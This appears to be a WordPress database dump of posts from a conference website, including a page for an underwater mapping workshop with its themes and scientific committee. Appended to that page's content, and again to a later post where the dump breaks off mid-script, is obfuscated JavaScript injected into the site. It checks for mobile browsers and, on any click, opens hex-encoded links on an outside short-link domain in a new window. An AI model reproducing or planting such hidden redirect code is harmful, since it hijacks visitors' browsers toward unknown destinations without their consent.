(3330,1,'2022-11-19 17:29:54','2022-11-19 17:29:54','','gsw2023_for2','','inherit','open','closed','','gsw2023_for2','','','2022-11-19 17:29:54','2022-11-19 17:29:54','',3049,'https://gsw2023.com/wp-content/uploads/2022/11/gsw2023_for2.jpg',0,'attachment','image/jpeg',0),
(3331,1,'2022-11-19 17:32:05','2022-11-19 17:32:05','','gsw2023_for2','','inherit','open','closed','','gsw2023_for2-2','','','2022-11-19 17:32:05','2022-11-19 17:32:05','',3049,'https://gsw2023.com/wp-content/uploads/2022/11/gsw2023_for2-1.jpg',0,'attachment','image/jpeg',0),
(3332,1,'2022-11-19 17:37:36','2022-11-19 17:37:36','','gsw2023_for2','','inherit','open','closed','','gsw2023_for2-3','','','2022-11-19 17:37:36','2022-11-19 17:37:36','',3049,'https://gsw2023.com/wp-content/uploads/2022/11/gsw2023_for2-2.jpg',0,'attachment','image/jpeg',0),
(3334,1,'2022-11-23 06:03:02','2022-11-23 06:03:02','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3349\" img_size=\"300x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Underwater Mapping Workshop : Geospatial techniques for underwater documentation, mapping and monitoring</strong></span></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n&nbsp;\r\n<h5 style=\"text-align: justify;\">In recent years, there has been a growing interest in methods and techniques for documenting, mapping and monitoring inland, coastal and open sea underwater environments. Drivers are diverse and range from the research of traces from the past to the protection and sustainable use of natural resources, from monitoring of marine ecosystems to hydrological studies. This workshop will gather contributions on state of the art and future trends on, but not limited to, the following topics: underwater photogrammetry, through water airborne photo-bathymetry and lidar-bathymetry, acoustic and optical positioning, underwater geodetic surveying, visual inertial simultaneous localization and mapping, subsea metrology, multi and hyper spectral imaging, underwater autonomous unmanned and tethered systems, underwater change monitoring. The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"turquoise\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"60\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"turquoise\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5 style=\"text-align: justify; color: blue;\"><u>Themes of event:</u></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Multimedia geometry for underwater image and range measurements</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Geometric calibration, colour correction and restoration, validation of systems for underwater 3D measurements</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Combined above-water, through-water and underwater techniques for 3D modelling and mapping of coastal habitat</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Lidar, photo and spectrally derived bathymetry for seafloor and water surface measurement</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Spaceborne techniques and applications for coastal mapping</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>AI-driven solutions for through-water, underwater and habitat mapping applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Algorithms and methods for underwater localization, navigation and mapping, including, SLAM, visual inertial odometry, augmented and virtual reality applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Sensors’ integration and performance evaluation of UAVs, UUVs (ROVs and AUVs), towed vehicles and diver operated systems</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Underwater applications and methods in archaeology, habitat mapping and monitoring, industrial metrology and inspections, volumetric reconstruction for flow tracking</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Using/creating benchmark data sets</strong></h6>\r\n</li>\r\n</ul>\r\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Loïca Avanthey, SEAL, LRE, EPITA, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Michael Bleier, Computer Science VII: Robotics and Telematics, Julius-Maximilians-Universität Würzburg, Germany</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Fabio Bruno, Department of Mechanical, Energetics and Management Engineering, University of Calabria, 3D Research s.r.l., Arcavacata di Rende, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Alessandro Capra, University of Modena and Reggio Emilia, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Silvio Del Pizzo, Parthenope University of Naples, Naples, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Pierre Drap, LIS UMR CNRS, Marseille, France, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Nuno Gracias, ViCOROB - Computer vision and robotics research Institute, Universitat de Girona, Spain</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Kevin Köser, Oceanic Machine Vision, GEOMAR Helmholtz Centre for Ocean Research Kiel, Germany</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Hans-Gerd Maas, Institute of Photogrammetry and Remote Sensing, TU Dresden, Germany</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Nikola Miskovic, Laboratory for Underwater Systems and Technologies – LABUST, Faculty of Electrical Engineering and Computing, Department of Control and Computer Engineering, University of Zagreb, Croatia</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohammad Motasem Nawaf, Aix-Marseille University, LIS UMR CNRS, Marseille, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Gaia Pavoni, Visual Computing Lab, Institute of Information Science and Technologies \"Alessandro Faedo\" (ISTI), CNR, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Alessandro Ridolfi, Dipartimento di Ingegneria Industriale (DIEF), Università degli Studi di Firenze, Firenze, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Katja Richter, Institute of Photogrammetry and Remote Sensing, TU Dresden, Germany</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Robin Rofallski, Jade University of Applied Sciences, Oldenburg &amp; KARO3D Vision, Oldenburg, Germany</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mark Shortis, FSSSI FRICS (Retired) Honorary Professor, School of Science RMIT University, Melbourne, Australia</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Tali Treibitz,  Viseaon Marine Imaging Lab, Charney School of Marine Sciences, University of Haifa, Israel</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Patrick Westfeld, Federal Maritime and Hydrographic Agency (BSH), Germany</strong></h6>\r\n</li>\r\n</ul>\r\n<h6><strong>.</strong></h6>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Underwater Mapping Workshop : Geospatial techniques for underwater documentation, mapping and monitoring</strong>','','publish','closed','closed','','underwater-mapping-workshop-geospatial-techniques-for-underwater-documentation-mapping-and-monitoring','','','2023-02-05 14:41:13','2023-02-05 14:41:13','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=3334',0,'dt_portfolio','',0),
(3335,1,'2022-11-23 06:01:51','2022-11-23 06:01:51','','w22m1','','inherit','open','closed','','w22m1','','','2022-11-23 06:01:51','2022-11-23 06:01:51','',3334,'https://gsw2023.com/wp-content/uploads/2022/11/w22m1.jpg',0,'attachment','image/jpeg',0),
(3336,1,'2022-11-23 06:03:02','2022-11-23 06:03:02','','<strong>Underwater Mapping Workshop : Geospatial techniques for underwater documentation, mapping and monitoring</strong>','','inherit','closed','closed','','3334-revision-v1','','','2022-11-23 06:03:02','2022-11-23 06:03:02','',3334,'https://gsw2023.com/?p=3336',0,'revision','',0),
(3337,1,'2022-11-23 06:06:23','2022-11-23 06:06:23','<!-- wp:paragraph -->\n<p>University of Sassari (WGII/7)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 